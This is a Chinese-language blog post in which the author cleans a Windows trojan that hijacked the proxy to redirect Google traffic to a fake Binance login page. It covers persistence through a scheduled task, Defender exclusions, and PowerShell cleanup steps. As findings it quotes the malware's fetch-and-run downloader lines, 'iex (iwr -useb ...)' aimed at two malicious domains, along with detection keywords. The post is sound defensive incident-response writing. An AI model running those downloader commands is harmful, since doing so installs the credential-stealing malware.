2026年6月27日 星期六

Google相關網頁 (Youtube, gmail)被綁架到幣安?記一次 Win11 代理劫持病毒抓蟲實錄

 


1. 檢查本機的 DNS 伺服器設定 (最有可能)

惡意程式通常會竄改您網卡的 DNS,讓您在輸入正確網址(如 youtube.com)時,被導向駭客架設的假網頁伺服器。

  • Win + R 開啟執行視窗,輸入 ncpa.cpl 並按 Enter。

  • 找到您目前正在上網的網路連線(Wi-Fi 或乙太網路),按右鍵選擇「內容」。

  • 在清單中找到並雙擊「網際網路通訊協定第 4 版 (TCP/IPv4)」。

查看下方是否被選取了「使用下列的 DNS 伺服器位址」並填入了不明的 IP。

2. 檢查 Windows Hosts 檔案

有些流氓軟體會直接修改 Windows 系統底層的網址對應表。

  • 開啟檔案總管,前往:C:\Windows\System32\drivers\etc

  • 使用「記事本」開啟名為 hosts 的檔案。

  • 檢查檔案最下方,是否有任何將 google.comyoutube.combinance.com 對應到奇怪 IP 位址的設定。

  • 解法: 如果有,請將那些行刪除,然後存檔(您可能需要將記事本以「系統管理員身分」執行才能存檔)。

3. 檢查您的路由器 (如果手機連同一個 Wi-Fi 也會這樣)

如果您發現不僅是電腦,連手機連上家裡同一個 Wi-Fi 時,開網頁也會被導向這個畫面,那表示您的 Wi-Fi 路由器已經被駭客入侵並竄改了 DNS

  • 解法: 您需要登入路由器的管理後台(通常是 192.168.0.1192.168.1.1),檢查 WAN/LAN 設定中的 DNS 是否被改為不明位址。建議直接將路由器恢復原廠設定 (Reset),並更改路由器的管理密碼。

4. 檢查區域網路 (LAN) 與 Proxy 腳本

很多惡意軟體不會修改 DNS,而是塞入一個隱藏的「自動設定指令碼 (PAC)」,讓您的網頁流量全部繞道去駭客的伺服器。

  • Win + R 開啟執行視窗,輸入 inetcpl.cpl 並按 Enter,開啟「網際網路內容」。

  • 切換到最右邊的 「連線」 分頁。

  • 點擊下方的 「區域網路設定 (LAN settings)」

  • 關鍵檢查: 確認 不要勾選「使用自動設定指令碼」或「為您的區域網路使用 Proxy 伺服器」。這個視窗裡應該只要勾選最上方的「自動偵測設定」即可。如果有被勾選並填入奇怪的網址,請取消勾選並按確定。

5. 重設網路通訊協定 (Winsock) 與清除 DNS 快取

如果 Windows 底層的網路介面被植入了惡意攔截器(LSP 劫持),常規的設定畫面是看不出來的,我們需要從指令列將網路底層重置。

  • 點擊 Windows 開始按鈕,搜尋 cmd

  • 在「命令提示字元」上按右鍵,選擇 「以系統管理員身分執行」

  • 輸入以下指令並按 Enter 執行:netsh winsock reset

  • 接著輸入以下指令並按 Enter 執行:ipconfig /flushdns

  • 完成後,請將電腦重新開機,再測試看看網頁是否恢復正常。

6. 檢查瀏覽器捷徑是否被「加料」

有時候設定都是正常的,但惡意軟體修改了您桌面或工作列上的瀏覽器捷徑,讓瀏覽器啟動時自動掛載惡意指令。

  • 在桌面或工作列的 Chrome / Edge 圖示上按右鍵。

  • 再對著選單裡的 Google Chrome / Microsoft Edge 按右鍵,選擇 「內容」

  • 檢查 「目標 (Target)」 欄位。正常情況下,路徑應該以 chrome.exe"msedge.exe" 結尾。

  • 如果引號後面被偷偷加上了類似 --proxy-server=... 或一段奇怪的網址,請將那些多出來的字元刪除,然後點擊「套用」。


結果用4, 檢查區域網路(LAN) 與Proxy 看到奇怪的設定,就是用Win+R 輸入 inetcpl.cpl 選連線,再選Lan


之後的步驟

步驟一:立即解除 Proxy 攔截 

  1. 在「區域網路 (LAN) 設定」視窗中,取消勾選「為您的 LAN 使用 Proxy 伺服器」。

  2. 確保只勾選最上面的「自動偵測設定」。

  3. 點擊「確定」後,再點擊「套用」。

  • 注意:做完這步後,應該會暫時恢復正常,可以上 Google 了。但如果不把惡意程式殺掉,它過一陣子或重開機後,很可能會自己再把這個 Proxy 勾回來。

步驟二:找出並終止惡意處理程序 

既然我們知道惡意程式躲在連接埠 59104,我們就可以用指令把它揪出來:

  1. 點擊 Windows 開始按鈕,搜尋 cmd

  2. 在「命令提示字元」上按右鍵,選擇「以系統管理員身分執行」。

  3. 輸入以下指令並按 Enter: netstat -ano | findstr 59104

  4. 您會看到一行結果,最右邊會有一組數字(例如 8732),這就是該惡意程式的處理程序識別碼 (PID)

  5. Ctrl + Shift + Esc 打開「工作管理員」。

  6. 切換到左側的「詳細資料」分頁。

  7. 點擊上方的「PID」欄位來排序,找到剛剛那組數字。

  8. 看看這個 PID 對應的是什麼名稱的執行檔(.exe)。找到後,對它按右鍵選擇「開啟檔案位置」(記下這個惡意檔案藏在哪裡),然後再對它按右鍵選擇「結束工作」。

最後發現這個…




但怎麼清也清不掉,用windows defender 還是殺毒的軟體都清不掉。
進安全模式殺了後,回去正常模式還會跑出來…
很難纏的對手


一、症狀

這類感染常見症狀:

1. Windows Proxy 被自動打開
2. 瀏覽器被導向奇怪網站
3. 要求登入 Binance / 幣安 / 加密貨幣帳號
4. C:\Windows\System32 裡出現奇怪資料夾
5. 刪掉後重開機又回來
6. Defender / Malwarebytes 一開始可能掃不到

本案例中的惡意資料夾名稱類似:

C:\Windows\System32\OSSoftwareInstallerLatest-07jn5i

裡面可能有:

node.exe
app.js
preload.js
*.node

整理一次實際遇到的 Windows 木馬清除經驗。這類病毒的特徵是:你看到惡意資料夾、奇怪的 node.exe,甚至手動刪掉後,重開機或連網後又會自動回來。

真正的問題通常不是那個檔案本身,而是背後有排程工作、PowerShell downloader、Defender 排除項等持久化機制。只刪檔案不會乾淨,必須把「讓它復活的機制」一起刪掉。


二、先斷網

第一步,先拔網路線或關閉 Wi-Fi。

原因是這類木馬可能會透過 PowerShell 重新下載 payload。斷網可以避免它繼續下載惡意檔案或回傳資料。


三、下載並執行 Autoruns

用另一台乾淨電腦下載 Microsoft Sysinternals Autoruns,然後複製到中毒電腦。

在中毒電腦上:

Autoruns64.exe → 右鍵 → 以系統管理員身分執行

等待 Autoruns 掃描完成。


四、搜尋可疑排程與啟動項

在 Autoruns 裡按:

Ctrl + F

搜尋以下關鍵字:

OSSoftwareInstaller
node.exe
powershell
iwr
iex
westgroupfields
cloudsmeadow

本案例中找到的關鍵持久化點是排程工作:

Microsoft\Windows\Integrity\OSSoftwareInstallerLatest-07jn5i

內容含 PowerShell 下載器,例如:

iex (iwr -useb westgroupfields.com)
iex (iwr -useb cloudsmeadow.info)

這就是病毒會「刪掉又回來」的原因。


五、刪除惡意排程

可以在 Autoruns 裡直接取消勾選或刪除可疑項目。

也可以用系統管理員 PowerShell 查詢:

Get-ScheduledTask | Where-Object {
    $_.TaskName -match "OSSoftwareInstaller" -or
    $_.TaskPath -match "Integrity"
}

確認看到可疑排程後刪除:

Unregister-ScheduledTask `
-TaskPath "\Microsoft\Windows\Integrity\" `
-TaskName "OSSoftwareInstallerLatest-07jn5i" `
-Confirm:$false

如果 TaskName 不完全相同,請以實際看到的名稱為準。


六、結束可疑程序並刪除惡意資料夾

先檢查是否有相關程序在執行:

Get-Process | Where-Object {
    $_.ProcessName -match "node|powershell|Updater"
}

如果看到可疑的 node.exe 或奇怪的 Updater.exe,可以先結束:

Stop-Process -Name node -Force -ErrorAction SilentlyContinue

然後刪除惡意資料夾:

Remove-Item "C:\Windows\System32\OSSoftwareInstallerLatest-07jn5i" -Recurse -Force

如果資料夾名稱不同,請改成實際看到的名稱。


七、清除 Windows Defender 排除項

這類木馬可能會把 Windows Defender 的排除項打開,讓 Defender 不掃它。

先查看 Defender 排除項:

Get-MpPreference | Select-Object ExclusionPath, ExclusionProcess

如果看到類似以下內容,就很可疑:

C:\WINDOWS\system32
powershell.EXE
C:\Users\<user>\1
C:\Program Files\Virtual Desktop Streamer\Updater.exe

移除可疑排除項:

Remove-MpPreference -ExclusionPath "C:\WINDOWS\system32" -ErrorAction SilentlyContinue
Remove-MpPreference -ExclusionPath "C:\Users\$env:USERNAME\1" -ErrorAction SilentlyContinue
Remove-MpPreference -ExclusionProcess "powershell.EXE" -ErrorAction SilentlyContinue

再次確認:

Get-MpPreference | Select-Object ExclusionPath, ExclusionProcess

理想狀態是排除項清空,或至少沒有可疑項目。


八、重設 Proxy

這類病毒常會修改 Windows Proxy。

可以先到 Windows 設定確認:

設定 → 網路和網際網路 → Proxy

關閉:

使用 Proxy 伺服器

也可以用指令重設:

netsh winhttp reset proxy

再檢查目前使用者的 Proxy 設定:

Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" |
Select ProxyEnable, ProxyServer

如果 ProxyEnable1,可以關閉:

Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name ProxyEnable -Value 0
Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name ProxyServer -ErrorAction SilentlyContinue

九、更新 Defender 並掃描

先更新 Windows Defender 病毒碼:

Update-MpSignature

執行完整掃描:

Start-MpScan -ScanType FullScan

再執行 Defender Offline Scan:

Start-MpWDOScan

電腦會重開機並進行離線掃描。


十、檢查 Defender 偵測紀錄

掃描後可以查看 Defender 偵測紀錄:

Get-MpThreat | Format-List *

以及:

Get-MpThreatDetection | Format-List *

本案例中後來看到的偵測名稱包含:

Trojan:Win32/Malgent
Trojan:PowerShell/JSCeal.AIVB!ams
VirTool:Win32/DefenderTamperingRestore
HackTool:Win32/WebBrowserPassView

其中一個可疑 installer 是:

C:\Users\<user>\Downloads\x64-v58.833.6-install.exe
C:\Users\<user>\Downloads\x64-v58.833.6-install (1).exe
C:\Users\<user>\Downloads\x64-v58.833.6-install (2).exe

後續 payload 則出現在:

C:\Users\<user>\1\Updater.exe

十一、檢查隔離區,不要還原

查看 Defender 隔離清單:

& "$env:ProgramData\Microsoft\Windows Defender\Platform\$((Get-ChildItem "$env:ProgramData\Microsoft\Windows Defender\Platform" | Sort-Object Name -Descending | Select-Object -First 1).Name)\MpCmdRun.exe" -Restore -ListAll

如果看到病毒檔案已被隔離,例如:

x64-v58.833.6-install.exe
x64-v58.833.6-install (1).exe
x64-v58.833.6-install (2).exe

不要還原,不要執行。

保留隔離狀態即可。


十二、重開機驗證

清除後重開機,確認以下事項:

  • 惡意資料夾沒有回來。
  • Proxy 沒有自動打開。
  • Autoruns 沒有可疑排程。
  • Defender 排除項沒有可疑項目。
  • 瀏覽器沒有再被導向奇怪網站。

再次檢查排程:

Get-ScheduledTask | Where-Object {
    $_.TaskName -match "OSSoftwareInstaller" -or
    $_.TaskPath -match "Integrity"
}

如果沒有輸出,代表該排程已清除。


十三、帳號安全處理

因為本案例出現 WebBrowserPassView 類偵測,代表可能涉及瀏覽器密碼或憑證竊取風險。

建議用乾淨裝置處理以下事項:

  • 更改 Google 密碼。
  • 更改 Microsoft / Apple 密碼。
  • 更改 Binance / 交易所密碼。
  • 更改銀行、券商、信用卡相關帳號密碼。
  • 檢查 Google 最近登入裝置。
  • 登出所有不明裝置。
  • 檢查 Binance API Key、提款白名單、裝置管理。
  • 開啟或重設 2FA。

Chrome / Edge 內儲存過的重要密碼,建議全部視為可能外洩,重新設定。


十四、判斷是否清乾淨

可以暫時認為清除成功的條件:

  • 重開機後惡意資料夾沒有重生。
  • Proxy 不再自動被打開。
  • Defender 排除項已清除。
  • Autoruns 沒有可疑排程。
  • Defender Full Scan / Offline Scan 沒有新威脅。
  • Get-MpThreatDetection 顯示 ActionSuccess=True
  • 連網後觀察一段時間沒有復發。

本案例感染鏈整理

可疑 installer:
x64-v58.833.6-install.exe

後續 payload:
C:\Users\<user>\1\Updater.exe

惡意行為:
PowerShell downloader
Defender tampering
新增 Defender exclusion
建立 Scheduled Task
System32 內建立 Node.js payload
修改 Windows Proxy
導向 Binance / 加密貨幣相關頁面

最重要觀念

不要只刪 node.exe 或惡意資料夾。

真正要處理的是:

Scheduled Task
PowerShell Downloader
Defender Exclusion
Proxy 設定
後續 payload

否則資料夾刪掉後,排程下一次又會把它下載回來。

這類感染的重點不是「看到什麼檔案就刪什麼檔案」,而是要找到誰讓它復活。Autoruns 在這種情況下非常有用,因為它可以把啟動項、排程、服務、常駐機制一次攤開來看。


提醒:以上內容是針對本案例整理出的處理流程。不同感染可能有不同檔名、路徑與排程名稱。操作前請確認自己看到的項目確實可疑,不要任意刪除正常系統檔案。如果不確定,建議先備份重要資料,或請熟悉 Windows 安全的人協助判斷。

沒有留言:

張貼留言